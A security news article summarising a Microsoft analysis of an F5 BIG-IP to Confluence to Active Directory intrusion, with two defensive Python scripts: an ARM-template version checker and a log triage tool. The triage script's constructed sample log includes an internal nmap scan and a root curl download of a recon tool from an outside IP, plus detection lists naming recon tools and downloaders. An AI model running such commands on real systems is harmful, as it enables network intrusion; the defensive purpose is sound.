F5 and Confluence Attack Chain Hits Hybrid Identity

Summary

Microsoft detailed a multi-stage intrusion in which attackers compromised an internet-facing F5 BIG-IP appliance, pivoted over SSH to an internal Linux host, then exploited a self-hosted Confluence server to steal credentials and target Active Directory. The incident shows how edge devices, Linux systems, and internal web applications become links in a single attack path in hybrid environments, which makes monitoring and patching across all of them essential.

Introduction

Microsoft has published a new incident analysis showing how a compromise of an internet-facing edge appliance can quickly turn into a much broader enterprise breach. For security teams, the key lesson is clear: edge devices, Linux servers, internal web apps, and identity systems must all be treated as part of the same attack surface.

What happened

The attack chain began with an F5 BIG-IP Virtual Edition appliance hosted in Azure. Microsoft said the device was running an end-of-life version, so exploitation of a known, unpatched vulnerability in that version is the likely initial entry point.

The threat actor then:

  • Used the F5 appliance to gain SSH access to an internal Linux server
  • Performed network discovery and reconnaissance with tools including Nmap and gowitness
  • Downloaded a custom Linux reconnaissance tool detected as HackTool:Linux/MalPack.B
  • Identified an unpatched Atlassian Confluence server and used it for remote code execution
  • Extracted credentials from Confluence configuration files
  • Attempted NTLM and Kerberos relay-style attacks against Active Directory, including activity tied to CVE-2025-33073 (an NTLM reflection flaw in the Windows SMB client, patched in June 2025)

Microsoft noted that the attacker maintained privileged access without deploying a formal persistence mechanism, relying instead on the valid credentials it had harvested and on over-privileged accounts that were already trusted in the environment.

Why this matters for defenders

This incident shows how modern attacks increasingly cross traditional boundaries:

  • Edge appliances are becoming high-value initial access points
  • Linux systems are often less monitored than Windows endpoints
  • Internal apps like Confluence can expose sensitive service credentials
  • Hybrid identity trust relationships can enable lateral movement that bypasses perimeter-focused defenses

Even when a vulnerable application is not internet-facing, attackers can still reach it after compromising another trusted system inside the environment.

Impact on IT administrators

Security and infrastructure teams should review whether they have:

  • Unsupported or end-of-life edge appliances still in production
  • Over-privileged Linux accounts with broad sudo access
  • Unpatched Confluence or other internal web applications
  • Monitoring coverage across network devices, Linux hosts, internal web applications, and identity events

Organizations using Azure-hosted network appliances should also validate the image publisher, offer, SKU, and version pinned in their ARM templates or Terraform deployments, since an end-of-life version baked into infrastructure-as-code will be redeployed unchanged every time the template runs.
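
As an added example (not code from Microsoft's report), the following Python script walks an ARM template, finds every imageReference published by F5, and flags versions below a minimum supported version, "latest" references that are not pinned, and ARM expressions that cannot be checked statically. The publisher name, the minimum version, and the sample template are assumptions constructed for the demo; substitute the oldest version F5 currently supports for your SKU.

```python
import json
import sys

# Assumptions for this demo (not from the Microsoft write-up):
# the Azure Marketplace publisher used by F5 and the oldest version you still accept.
F5_PUBLISHER = "f5-networks"
MIN_SUPPORTED_VERSION = "17.1.0"


def _version_tuple(version):
    """Turn '15.1.000000' into (15, 1, 0) so versions compare numerically."""
    return tuple(int(p) if p.isdigit() else 0 for p in version.split("."))


def iter_image_refs(node, path="$"):
    """Yield (json_path, imageReference dict) for every imageReference in the template."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == "imageReference" and isinstance(value, dict):
                yield child, value
            else:
                yield from iter_image_refs(value, child)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from iter_image_refs(value, f"{path}[{i}]")


def check_template(template, min_version=MIN_SUPPORTED_VERSION, publisher=F5_PUBLISHER):
    """Return (json_path, version, reason) for every F5 image that needs attention."""
    findings = []
    for path, ref in iter_image_refs(template):
        if str(ref.get("publisher", "")).lower() != publisher:
            continue  # only F5 images are in scope here
        version = str(ref.get("version", ""))
        if version.startswith("["):
            # e.g. [parameters('imageVersion')]: resolve parameters before judging it
            findings.append((path, version, "unresolved ARM expression; resolve parameters first"))
        elif version.lower() == "latest":
            findings.append((path, version, "unpinned; record the resolved version at deploy time"))
        elif _version_tuple(version) < _version_tuple(min_version):
            findings.append((path, version, f"below minimum supported version {min_version}"))
    return findings


# Constructed sample template: one EOL BIG-IP, one current BIG-IP, one unpinned BIG-IP,
# and an unrelated Ubuntu jump host that must not be flagged.
SAMPLE_TEMPLATE = {
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "resources": [
        {"type": "Microsoft.Compute/virtualMachines", "name": "bigip-old",
         "properties": {"storageProfile": {"imageReference": {
             "publisher": "f5-networks", "offer": "example-offer",
             "sku": "example-sku", "version": "15.1.000000"}}}},
        {"type": "Microsoft.Compute/virtualMachines", "name": "bigip-current",
         "properties": {"storageProfile": {"imageReference": {
             "publisher": "f5-networks", "offer": "example-offer",
             "sku": "example-sku", "version": "17.1.100000"}}}},
        {"type": "Microsoft.Compute/virtualMachines", "name": "bigip-unpinned",
         "properties": {"storageProfile": {"imageReference": {
             "publisher": "f5-networks", "offer": "example-offer",
             "sku": "example-sku", "version": "latest"}}}},
        {"type": "Microsoft.Compute/virtualMachines", "name": "jump",
         "properties": {"storageProfile": {"imageReference": {
             "publisher": "Canonical", "offer": "0001-com-ubuntu-server-jammy",
             "sku": "22_04-lts-gen2", "version": "latest"}}}},
    ],
}


if __name__ == "__main__":
    # Usage: python check_f5_images.py template.json   (falls back to the sample above)
    template = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_TEMPLATE
    for path, version, reason in check_template(template):
        print(f"{path}: version={version!r} -> {reason}")
```

Run it against each exported template in your pipeline; a "latest" finding is not a vulnerability by itself, but it means the deployed version is whatever the marketplace served that day, so the resolved version has to be captured and compared separately.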

  • Patch or replace EOL F5 BIG-IP instances immediately
  • Audit and reduce privileged SSH access on Linux systems
  • Patch Confluence, review the application credentials it stores (self-hosted Confluence keeps its database connection credentials in confluence.cfg.xml), and rotate any that may have been exposed
  • Monitor for unusual cross-system authentication activity involving service accounts
  • Use Microsoft Defender XDR detections, advanced hunting, and attack path analysis to identify related exposure
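
The last two recommendations can be turned into concrete detection logic. As an added example (not Microsoft's detection content), the following Python script triages Linux sshd and sudo log lines for the pattern described above: SSH logins arriving from the edge-appliance subnet, service accounts logging in from a source never seen in a baseline, and sudo invocations of reconnaissance tools or root-level downloads. The subnet, the tool list, the baseline, and the log lines are all constructed for the demo.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed assumptions for the demo: the management subnet of the edge appliances,
# and binaries that should not run under sudo on an application server.
EDGE_SUBNETS = [ipaddress.ip_network("10.10.0.0/24")]
RECON_TOOLS = {"nmap", "gowitness", "masscan"}
DOWNLOADERS = {"curl", "wget"}

# Standard OpenSSH "Accepted" line and standard sudo command log format.
SSH_ACCEPT = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<src>\S+) port \d+"
)
SUDO_CMD = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=\S+ ; PWD=\S+ ; USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.+)$"
)


def _in_edge_subnet(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in EDGE_SUBNETS)


def triage(lines, baseline):
    """Return (finding_type, user, detail, raw_line) tuples.

    baseline maps account -> set of source IPs seen during a known-quiet period,
    so a login from anywhere else is treated as a new source for that account.
    """
    findings = []
    seen = defaultdict(set, {user: set(ips) for user, ips in baseline.items()})
    for line in lines:
        m = SSH_ACCEPT.search(line)
        if m:
            user, src = m["user"], m["src"]
            if _in_edge_subnet(src):
                # An edge appliance should terminate traffic, not originate SSH sessions.
                findings.append(("ssh_from_edge_appliance", user, src, line))
            elif src not in seen[user]:
                findings.append(("ssh_new_source_for_account", user, src, line))
            seen[user].add(src)
            continue
        m = SUDO_CMD.search(line)
        if m:
            binary = m["cmd"].split()[0].rsplit("/", 1)[-1]
            if binary in RECON_TOOLS:
                findings.append(("sudo_recon_tool", m["user"], binary, line))
            elif binary in DOWNLOADERS and m["target"] == "root":
                findings.append(("sudo_download_as_root", m["user"], binary, line))
    return findings


# Constructed sample: a service account arrives from the edge subnet, scans the internal
# range, and pulls a file as root; a human admin does routine work from a known source.
SAMPLE_LOG = """\
Jan 10 11:59:50 web01 sshd[1201]: Accepted publickey for svc_deploy from 10.10.0.5 port 51234 ssh2: RSA SHA256:constructed
Jan 10 12:00:03 web01 sudo:   svc_deploy : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/nmap -sS -p 22,80,443,8090 10.20.0.0/24
Jan 10 12:01:17 web01 sudo:   svc_deploy : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/curl -o /tmp/recon http://198.51.100.7/recon
Jan 10 12:05:00 web01 sshd[1250]: Accepted password for alice from 10.20.0.44 port 50110 ssh2
Jan 10 12:06:12 web01 sudo:    alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
""".splitlines()

# Constructed baseline: where each account normally logs in from.
BASELINE = {"alice": {"10.20.0.44"}, "svc_deploy": {"10.20.0.10"}}


if __name__ == "__main__":
    for kind, user, detail, raw in triage(SAMPLE_LOG, BASELINE):
        print(f"[{kind}] user={user} detail={detail}\n    {raw}")
```

The three findings this produces (edge-subnet login, nmap under sudo, curl as root) are exactly the steps the intrusion took on the Linux host, and none of them requires a signature for the custom tool Microsoft detected; the baseline comparison is what catches the over-privileged service account being used from an unexpected place.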

The broader takeaway is that defenders should stop treating edge, endpoint, internal application, and identity security as separate problems. Attackers already treat them as one connected path.

Tags: F5 BIG-IP, Confluence, Microsoft Defender XDR, Linux security, Active Directory
